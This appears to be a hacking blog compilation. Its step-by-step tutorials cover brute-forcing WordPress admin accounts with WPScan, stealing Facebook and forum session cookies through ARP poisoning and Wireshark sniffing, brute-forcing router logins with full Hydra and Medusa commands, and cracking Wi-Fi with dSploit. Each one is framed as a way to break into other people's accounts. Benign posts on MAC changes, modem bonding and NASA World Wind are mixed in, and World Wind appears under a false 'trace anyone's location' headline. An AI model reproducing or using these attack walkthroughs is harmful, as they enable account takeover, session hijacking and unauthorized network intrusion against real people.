Powered By Blogger

Tuesday, 14 January 2014

Change MAC Address In Windows

Steps
  1. 1
    Run the registry editor regedit (C:\windows\system32\regedit.exe)

Sunday, 12 January 2014

Hack Any Wordpress Account Using Wpscan

This tutorial will show you how to scan a wordpress installation using WPScan. It will show you how to download and install WPScan, download a wordlist, use WPScan to enumerate usernames and plugins, and bruteforce a username.
WPScan is included in backtrack 5 R1, if you are running R1 you can skip this part.

Installing WPScan in BT5.

Install dependences by issuing the following commands:

apt-get install libcurl4-gnutls-dev
gem install --user-install mime-types
gem install --user-install xml-simple
gem install --user-install typhoeus

Install WPScan by issuing the following commands:

cd /pentest/web
wget http://wpscan.googlecode.com/files/wpscan-1.0.zip
unzip wpscan-1.0.zip
rm -rf wpscan-1.0.zip
cd wpscan-1.0
wget http://www.exploitthis.com/wp-content/uploads/files/wordlist.lst

Using WPScan

Update your WPScan plugin list/

ruby ./wpscan.rb --generate_plugin_list 250

Get wordpress version and theme information.

ruby ./wpscan.rb --url targetsite.com

Scan for wordpress plugins to exploit.

ruby ./wpscan.rb --url targetsite.com --enumerate p

Find out wordpress usernames

ruby ./wpscan.rb --url targetsite.com --enumerate u

Bruteforce hack wordpress admin account.

ruby ./wpscan.rb --url targetsite.com --wordlist wordlist.lst --username admin

As you can see, WPScan is very simple. We were able to get the wordpress theme, plugins, and username. The target site did not have any vulnerable plugins installed. If it did, WPScan would have told us what exploits we could use for the vulnerable plugin.
You can find more information on WPScan at http://code.google.com/p/wpscan/

Use Internet on One PC With Two Modem

SPEED is the key to the success in the virtual world. No matter how fast and advanced system you are working on, unless it also races up on the Internet it's of no use. Talking in terms of India, good Internet connectivity and higher bandwidth is still a wannabe and in a majority of cases, the surfer really suffers due to limited bandwidth of the ISP, besides poor connectivity and telephone line conditions.
Practically, there is a lot more to be done as far as the bandwidth is concerned. But why wait for things to happen when you can create the world of faster Internet and better bandwidth.
Welcome to the world of modem doubling. Modem doubling in its most simple sense means combining two modems in one computer using two telephone lines. It is an inexpensive way for a user who wants a fast Internet connection but can only connect with an analog telephone line, to use two 56 KBPS modems to double the bandwidth.
It is not as simple as is said. If you try two modems on one computer and connect both to the Internet and start browsing, then you will find that the data transfer takes place with one modem at a time only and the other modem remains quite though it may happen that the switching of data packets is faster between two modems and may give you the feeling that both modems are working at the same time. But actually only one modem works at a time and the second connection is almost waste.
 

You may then wonder how the modem doubling is good? Modem doubling does not simply mean connecting two modems to the Internet simultaneously. It is actually far more than that as it is made possible by the use of two technologies:
1) Modem bonding
2) Modem teaming
Modem bonding is the most basic and also the inherent feature. It is supported by some ISPs also. Under the modem bonding, the Multilink Protocol Plus (MP+) is utilised to combine the bandwidth of two modems running two Internet connections on two telephone lines. Data packets are "inverse-multiplexed" through the two modems meaning that each of the modems receive half of the data packets as they are sent over the Internet and then are recombined.
An advantage of modem bonding is that if either the modems gets disconnected for some reason, the other modem will take over so that the connection isn't lost. In case of modem bonding, the software at both ends of the modem- to-modem connection enables the paired modems to work like a single channel. There are basically two methods of modem bonding:
1) EQL or it is also known as serial line load balancing. However, this is not common in practice and not many ISPs support it.
2) The second type of modem bonding is known as Multilinking. Multilinking is the most common type of modem bonding and is a common feature of Windows operating system. You can find the multilinking feature from Windows '98 SE onwards. However, not many ISPs provide multilinking facility in India.
In case you are sending the data through multilinking, then the first packet goes out on modem1 while the second packet is going out on modem2. Then the third packet follows the first packet on modem1. The forth packet goes on modem2. And this goes on and on. This is how the data is combined on two modems in multilinking. However, you must confirm it from your ISP, whether multilinking support is available with them. If it is available then all you need to do is configure your modem properties, which is a simple exercise, as you have to give details of the second modem connection.
If you are not lucky enough to employ multilinking then you need not lose heart, as there is another option available. This is called modem teaming. In case of modem teaming you are actually not dependent on the ISP and its support.
Any computer and Internet user can employ this technique to almost double the bandwidth. Under this technology, the modems work as separate connections and take advantage of the "smart download" capability that most HTTP and FTP servers use. However, using modem teaming you would need some special software to combine the bandwidth of two modem. Some of the good software available is Modem teamer and Midpoint companion available at www.midpoint.com and Sygate Office Network is also available at http://soho.sygate.com/products/access_ov.htm.
Both these products are good and offer good results for the end users. You can try this software for a limited period by downloading from their respective sites and can see the results in your specific case. Modem teaming is now successful and has come of age. Modem teaming has its own advantages and disadvantages. The biggest advantage of modem teaming is that you can combine as many analog modems you want and can boost the bandwidth of your Internet connection considerably.
However, the biggest limitations attached to modem teaming is that it is not flexible if one modem should disconnect nor is it useful when downloading streaming multimedia or conducting continuous sessions such as Telnet or PCAnywhere.
All said and done, modem teaming is still a great experience and a big performance booster. Modem teaming could do wonders in case you feel that you have a stable Internet connection but the speed is much slower

Hack Facebook And Gmail Using Cookie Stealing by Wireshark Tool

Facebook Cookie Stealing And Session Hijacking

Wireshark Software to capture cookies:
Wireshark is the best free packet sniffer software available today. Actually, it was developed for making a network secure. But, the same software is now used by hackers to test for vulnerability and security loopholes in the network and to attack the network accordingly. Cookie stealing being one of the types of hacks implemented using this Wireshark software.
Requirements:
Cain and Abel : http://www.oxid.it/cain.html
Wireshark : http://www.wireshark.org/
Firefox 3 (or one compatable with add n edit) : http://www.oldapps.com/firefox.php?old_firefox=59
Add n Edit (cookie editor for firefox) : https://addons.mozilla.org/en-US/firefox/addon/add-n-edit-cookies/
Acess to the network with user you want to hack
Network traffic
Prerequisites: Download and install all above programs. To add “Add n Edit” to your browser just open firefox, go to tools, then click add-ons. you can drag and drop the program from wherever you saved it into the little box that popped up and install it from there.
Below, I have listed steps on how to capture Facebook and other accounts cookies. This will help you to know how Wireshark and Cain-Abel can be used to sniff packets and capture cookies.

First: Gain acess to the Network. Open networks or your own network would be easy but if you have a specific slave you want you should be able to gain acess using Backtrack.
Tip: use reaver to exploit WPS for WPA/WPA2 encryptions, WEPs are easy to crack given time and OPN means there is no password.
Second: Right click Cain and choose ‘run as administrator.’ on the top bar go to ‘configure’ and be sure to select your wireless card/adapter. now click where it says ‘Sniffer’ then this litte button towards the top left:
facebook hacking cookies stealing
Next click any empty white box then the blue “+” symbol near the button you pressed just before. choose okay
should look like this:
facebook hacking cookies stealing
These are all the devices it was able to detect.
Now we go to APR on the bottom bar. Once again click any empty white box then the blue cross. It’s easiest to just go one by one and choose all possibilities.
facebook hacking cookies stealing
Now we have to poison them so we choose the little yellow hazard symbol towards the top left. should now look like this:
facebook hacking cookies stealing
we are done here, just minimize Cain for now.
Third: Run wireshark as administrator. On the top bar choose ‘Capture’ then ‘Interfaces.’ Here you will have to choose your interface that is connected to the Network we are sniffing from. if you wait a few seconds you might see some traffic being collected as seen in my photo, just choose that interface b/c thats most likely it.
facebook hacking cookies stealing
Wireshark will list and color-code all the traffic it sees for you. To make this simpler we can use the filter to only see the traffic we want, Type “http.cookie” in the filter. (Something to consider is to just filter to “http” and scroll through the entries looking for ones that start with the word “POST” this means that information was submitted to the webpage noted such as a username and a password! so if you see this just look through the details and you should see the info you want, most passwords will be hashed but use this site to decript them: http://www.md5decrypter.co.uk/ )
Here is an image:
facebook hacking cookies stealing
You can either look through this information manually or use the search function to find what you want. In my case i want to hijack the session of a user on the forum freerainbowtables.com so i will use the search function (press Ctrl+F, or go to edit -> search) and type in the information i know for sure will be in the entry. if your hijacking someones facebook put ‘facebook’ there. Most of the time to be safe i do not use the first entry i see b/c this will only work if the person is auto logged in, so just go down a few more until you see one you think will work (just use common sense).
facebook hacking cookies stealing
What we need are the cookies. Here are what mine look like and how to get there. With practice you will be able to tell which cookies are used for logins and be able to limit failed attempts.
facebook hacking cookies stealing
Copy the cookies as value and save them into a notepad (shown in pic above). I would suggest to seperate everywhere you see a “;” bc this suggests that is the begining of the next entry. The text to the left of the = is the name of the cookie and the text to the right is its value.
Final: Open up your firefox browser with Add n Edit enabled. You can get to your add ons by going to tools and they should all be listed in the drop down tab. First go to the website you are hijjacking the session from then open your cookie editor. Should look something like this:
facebook hacking cookies stealing
The last thing to do is to change your cookies to match the ones you captured. If the cookies given to you by the site expire (like the ones in my picture do) you will have to delete them and add all the ones we captured earlier in. if they do not expire you can just edit them. Bottom line is all the cookies must match the cookies you captures in the earlier steps EXACTLY! Make sure you do not add any extras and that you did not miss anything. Also all fields must be filled in (Path and Domain as well as Name and Value). My path is “/” and my domain is “.freerainbowtables.com”
mine looks like this:
facebook hacking cookies stealing
You are now done, Just close the cookie editor and reload the webpage. If done correctly with the correct cookies you should be logged in as the user you attacked!
So guys, I hope this
Facebook Cookie Stealing And Session Hijacking
will help you to hacking facebook as well as different types of account like hotmail yahoo etc by stealing their cookies. If you have any problem in above Facebook Cookie Stealing And Session Hijacking tutorial, please mention it in comments.

Use Medusa To Gain Access to Network Router

Using Hydra or Medusa to gain access to network router

After obtaining a connection to the network and having an IP address, besides trying to acccess the hosts on the network, the actual router can also be targetted.

This could be done by would be attackers to for instance attempt to delete any logs on the router which may have logged their intrusion to the network.
Or to simply reboot the router which mostly has the same effect.

On Windows based systems, this could be done using either Bruter or Brutus.

Using trusty ol' back|track, the preference goes to either medusa or hydra.

For the sake of this test, a simple test setup as follows ;
> Open network
> DHCP enabled

Basically the steps involved are as follows ;
  • Identify network
  • Gain access to network 
  • Obtain IP address
  • Check gateway IP
  • Check path the router setup page is using
  • Start Hydra / Medusa using wordlists for both login and password if login is not known.

airmon-ng
airmon-ng start wlan0
airodump-ng mon0 -t opn








ifconfig wlan0 down
iwconfig wlan0 essid default channel 1
iwconfig ap 00:13:D4:09:32:60
ifconfig wlan0 up






Check connection
iwconfig wlan0







Obtain IP address and check gateway
dhclient wlan0







Open upthe default gateway in your browser

Of course, before starting cracking away, it is always worth while to check the standard login / passwords first !
http://www.phenoelit-us.org/dpl/dpl.html





If no luck, then you have to revert to using wordlists, I have made a couple of small ones to try this out.

Starting Hydra to crack the router login / password.
-L          specifiying the path to login list
-P          specifying the path to password list
-t           limiting the number of connections
-e ns      to check for no password and to check login as password
-f           to stop when first login/password is found
-V          to show each login/password attempt
http-get  to specify the protocol to use
/index.asp to point to the webpage it is heading to

hydra 192.168.1.1 -L /wordlists/login.txt -P /wordlists/ap_password.txt -t 1 -e ns -f -V http-get /index.asp












For Medusa, the syntax is slightly different and took me a while to figure out what was necessary to avoid getting false positives, however the below worked for me ;

-h     to specify the host
-U     to specify path to the login wordlist
-P     to specify path to password wordlist
-t      to limit the number of connections
-f      to stop the test on finding a valid login/password
-v     for a more verbose output
-M    to specify the module to use
-m    to specify the options for the module in use

medusa -h 192.168.1.1 -U /wordlists/login.txt -P /wordlists/ap_password.txt -t 1 -e ns -f -v 5 -M http -m DIR:GET/index.asp










































Now when trying the found login / password, success !













Hydra homepage - http://www.thc.org

Medusa homepage - http://www.foofus.net

Trace Anyones Exact Location Using NASA Satellite Tool

What is NASA World Wind anyway?
World Wind is open source Windows software that lets you zoom from satellite altitude into any place on Earth. Leveraging Landsat satellite imagery and Shuttle Radar Topography Mission data, World Wind lets you experience Earth terrain in visually rich 3D, just as if you were really there. See World Wind for more information.

[edit] Before Installing

Read System Requirements, Software Requirements, and Minimum configuration (just scroll down a page). World Wind is large and demanding of computer resources.

[edit] How can I download NASA World Wind?

The latest version is 1.4.0. See What's new in 1.4.
This version is clearly marked if you go to Help->About in World Wind.
To get the latest version visit NASA World Wind Download.
Alternatively you can run a more Windows Vista/7 friendly version of NASA World Wind 1.4 at Spoon.net (please note a browser plugin is required).

[edit] What about the source code?

The source code is for developers. It is an additional download to the Full Install. If you just want to use World Wind and look around, all you need is the Full Install.
If you want the source code as well, download both. Once you run the full install, copy the Data directory from your World Wind full install directory into your source directory.
See source code for more information.

[edit] System Requirements

  • Windows 2000, 2003, XP, Vista and 7 (see Windows Vista/7 compatibility section below)
  • 3D graphics card (see Video Card Compatibility)
  • Internet connection
  • Sorry, no support for Linux or Macintosh yet (but you may check multiplatform World Wind Java SDK)

[edit] Windows Vista/7 compatibility

WorldWind Properties Dialog Box 1
WorldWind Properties Dialog Box 1
WorldWind Properties Dialog Box 2
WorldWind Properties Dialog Box 2
World Wind was not designed for Windows Vista or Windows 7, but can run on it. The best way is installing World Wind outside of the program files directory, in C:\NASA for example, or on another partition (e.g. D:\Program Files\NASA).
Another workaround is to leave UAC enabled and run World Wind as an administrator:
  • Install World Wind as you would any other Windows program. Once installed then right click the World Wind application or shortcut and select "properties." (See Dialog Box 1)
  • On the properties dialog box under the Compatibility tab select "Run this program as an administrator" and then save this change. (See Dialog Box 2)
World Wind can then be run as any other Windows program and the UAC prompts whether to allow or cancel it.
You can also change WW directory properties and give users full access rights to it.
Disabling UAC is not recommended!

[edit] Spoon Solution

An alternative solution is to run the Spoon.net version of NASA World Wind. This version does not seem to have any of the UAC or Managed DirectX problems that the standard installer has, but be aware a browser plugin is required to use any Spoon.net apps. Run NASA World Wind online at Spoon.net: spoon.net/worldwind.

[edit] Windows 95,98,ME compatibility

Since these versions of Windows are no longer maintained by Microsoft, World Wind may introduce features that will break compatibility with them. As such, World Wind should no longer be expected to run on these systems. However, you may find that it will work as long as your system meets the other minimum requirements.
If you are using any of these systems and are having problems, feel free to ask questions in the Forums and Chat.

[edit] Software Requirements

The installer should detect and direct you to install these by default. If you are installing these because you believe there is an error, please install in the order listed below.
Microsoft .NET 2.0
Microsoft Managed Directx 9.0c (October 2005 redistributable)

[edit] Minimum configuration

With the minimum configuration, performance and functionality may be less than expected.

[edit] Recommended configuration

  • 1.4 GHz or higher CPU
  • 256 MB of RAM
  • DSL/cable connection or faster
  • 3 GB of disk space
Features such as atmosphere scattering and sun shading require additional CPU & GPU resources.

[edit] Installation

[edit] "Upgrading" from 1.3.5

If you have 1.3.5 you can move the old datafiles from cache to use it with version 1.4: From:
C:\Program Files\NASA\World Wind 1.3\Cache\
to
C:\Program Files\NASA\World Wind 1.4\Cache\

[edit] "Upgrading" from 1.3.1.1 or earlier

There are several things to note when using the full install to upgrade to new versions from pre 1.3.2.

[edit] Blue Marble

The Blue Marble imagery has been removed from the installer in order to reduce the size of the initial download. The imagery will now download as you use World Wind.
If you have an old version of World Wind you can move the images to the new folder and you will not need to download them again. From:
  • 1.3.1 location: C:\Program Files\NASA\World Wind 1.3\Data\Earth\BlueMarbleTextures
  • 1.3.2 location: C:\Program Files\NASA\World Wind 1.3\Cache\Earth\Images\Blue Marble Tiled (1km per pixel)
to:
C:\Program Files\NASA\World Wind 1.4\Cache\Blue Marble
Also move the base image:
C:\Program Files\NASA\World Wind 1.3\Data\Earth\BlueMarbleTextures\land_shallow_topo_2048.dds
to:
C:\Program Files\NASA\World Wind 1.4\Cache\ImageUrls\worldwind.arc.nasa.gov\downloads\land_shallow_topo_2048.dds

[edit] Problems After a Successful Install

[edit] World Wind Fatal Error dialog box

If you get this error when World Wind loads try setting your display to either 16 or 32 bit color. There are reports that 24 or 32 bit color is causing this issue. 16 bit works without any issue. also check for graphic card compatibility.

[edit] My video card isn't working - "Unable to create the Direct3D m_Device3d" error

Check out the Video Card Compatibility list. Please, by all means, edit it depending on whether yours works.
Ensure that your video card drivers are up to date and Managed DirectX is installed.
Try going to Start->Run and typing 'dxdiag'. This should load up the DirectX Diagnosis program. Under Display please make sure everything is working and enabled.

[edit] Every time I try to run the program it crashes with a "JIT debugger" error message.

Yikes, these are the worst. A few notes when trying to debug these. The process ID and thread ID are pointless and don't really help at all. Any other error codes you might receive may be helpful. Do not be concerned that there was no debugger found. As we get more organized and get more of an idea what errors are coming up I will try to post additional information here.
If you get this error and want more detailed debugging information, you can start the World Wind application from the command line and redirect standard error to a file. This file will then contain the full text of the .NET exception and stack trace which may help in determining the cause of the problem. The following is a sample of launching World Wind to redirect standard error.
WorldWind.exe 2> error.log
Some people have reported that installing the software requirements listed above has fixed their issues.
A new DirectX Runtime can solve this problem: http://www.microsoft.com/downloads/details.aspx?FamilyID=4b1f5d0c-5e44-4864-93cd-464ef59da050&DisplayLang=en

[edit] My computer is crashing/hangs

Most likely you have a hardware/driver problem. Test your computer stability with 3D graphics by running for instance 3DMark or other DirectX benchmarking software.

[edit] Error x135

This error occurs when you try to run a .NET application but .NET is not installed (or is corrupt). To solve this error message, either install, or remove and reinstall .NET. See How Do I reinstall .Net?.

[edit] cordbg.exe !a 0x5b4 code

This is a compatibility problem with .Net. See How Do I reinstall .Net?.

[edit] How do I reinstall .Net?

  1. Uninstall all .Net.
  2. Delete microsoft.net in the Windows Directory and (maybe) in Program Files (directory).
  3. REBOOT.
  4. Start the World Wind install.
  5. It should ask to install .Net. Follow the instructions. (If you're not asked then you forget to delete something)
  6. REBOOT.
  7. Start the World Wind install again.
  8. It may ask to install DirectX runtime. Say "ok".
  9. Start the World Wind install again.
  10. Finished.

[edit] More Debugging Help

This blog post points to several verification tools to make sure .NET is installed properly.

[edit] No Landsat icons / No Images in Layer Manager

If you are missing your "Images" or "ZoomIt!" choices in the Layer Manager. Check to make sure World Wind can connect to the Internet. These are downloaded when you start World Wind. Most likely cause is a proxy or firewall blocking World Wind. (see also Issues Downloading Tiles)
This can also happen on Windows Vista - see Vista compatibility section.

[edit] Issues Downloading Tiles

To make sure there is no server-side problem check Server status page.

[edit] Download Monitor

Download progress monitor window showing detailed information about requested files
Download progress monitor window showing detailed information about requested files
World Wind version 1.3 has a download monitor which can be very helpful diagnosing problems. Hold down Control (Ctrl) and hit H.

[edit] Why am I getting 'Problem connecting to server. Trying again in 2 minutes'

Several possible reasons:
  1. Maybe the server is down. You could say... try again in 2 minutes.
  2. You may be behind a blocking proxy/firewall. You'll need to configure a port remapper, or hunt down an admin to help. See below.
  3. Make sure you have installed [1]. (Issue WW-6)
  4. You could be in a country that blocks access to worldwind sites & download servers. Try to find a proxy? We haven't yet had any confirmed reports of this.
  5. Remember to use the HTTP Download Monitor (CTRL+H) to see what exactly is going on. Double click an entry and you get a box. Paste the contents of that box into a new forum thread in the technical support section and someone will come along and help you.

[edit] Is there a way to set a proxy?

Press Alt+Q to edit the proxy settings. The default setting is to use the Windows default proxy settings.

[edit] Proxy Issues

If using the proxy settings in World Wind doesn't work you may want to try using a portmapper such as AnalogX PortMapper.

[edit] Why are the wrong image tiles showing up?

It is possible that you are viewing more than one layer and therefore are not seeing the tile you expect. Go to the Layer Manager and make sure only one image layer box is checked.
If you still believe that the tile contains bad data you can hit F5 to refresh the current view. This will redownload all visible tiles for all active layers. Alternatively, follow the instructions for "How are the tiles named?" to delete the individual tile.
If you do manage to find a "bad" tile and keep downloading the same "bad" tile, please kindly record the filename information of the tile and let someone know in Chat or on the Forums.

[edit] How are the tiles named?

The tile-naming structure is based on the layer name, level, longitude and latitude. [2]
Starting with World Wind 1.3.3 you can view tile name information from within World Wind.
To view tile filenames and outlines open the Layer Manager and right-click on any bottom level image node (an item without an arrow) and select Properties. In the resulting window change the RenderTileFileNames property value to True and you will see the red outline and text for each tile.
Be aware that the text and outlines are rendered at a different height to the terrain; for best results set the Vertical Exaggeration to 0 and make sure you're viewing the center of the outline.

Crack Wi-Fi Password Using Android Tool dSploit

Resources

An Android smartphone
dSploit

Step by Step

Step 01

Downloading
The first step is to get a copy of dSploit onto your Android device. You should be able to download a copy directly from whatever browser you use on your device. If you have a USB port on your device, you can download it on your desktop and transfer it with a USB drive.

Step 02

Permissions
You will need to do things in terms of permissions on your device. The first requirement is that it needs to be rooted. This gives dSploit root access to your wireless interface so that you can put it in promiscuous mode. The second is that you need to allow sideloading of apps, since dSploit is not on the Play Store.

Step 03

Copying and installation
Once you have the APK copied, or downloaded, you will need to install it. The easiest way is to use a file manager of some kind, navigate to where the file exists, and select it. The file manager should start up the installer.

Step 04

Starting
When you start up dSploit, it will immediately start listening on the wireless network you’re connected to. Depending on the hardware available, this may affect the responsiveness of your device. You can tap on the menu and then on “Stop Network Monitor”.

Step 05

Wi-Fi cracking
You can tap on the Wi-Fi signal icon to see which networks are visible. You can click on a network to connect. If it is a ‘secured’ network that is vulnerable to one of the cracking techniques available, it will be flagged as green, identifying it as such. Clicking on that network offers you the options of either connecting or cracking.

Step 06

Trace
One thing you may want to check on is how packets are being routed within your own network. Clicking on a target machine will bring up a menu of applicable tools. You can click on the Trace tool to follow how packets move around within the network.

Step 07

Port scanning
The first step when a ‘bad guy’ tries to compromise your system is to knock on your virtual door with a port scan. In dSploit, you can do this by tapping on the Port Scanner tool after selecting a host to test.

Step 08

More port scanning
Once you get the list of open ports, you can click on them to try to connect. If it is a port used for web traffic, it will try to open it in a browser. Otherwise, it will try to open a connection using Telnet.

Step 09

Inspector module
The Inspector module does some further probing to get an idea what operating system is running on the host, along with what kind of services are running on the open ports. This may take several minutes to complete, so be patient. In this example, we can see that the author’s TV box is running Linux.

Step 10

Vulnerability Finder
Now that you know what the OS is, and which ports are open to connections, you need to check to see what problems may be affecting this particular system. Again, these checks can take several minutes, so be patient. The total list is ordered according to severity.

Step 11

More vulnerabilities
The original list provides a short description of the vulnerability, but often this is not enough. Clicking on the vulnerability of interest will open the associated webpage from the National Vulnerability Database, hosted by the NIST (nvd.nist.gov). Here you can get more information on just how serious it may really be.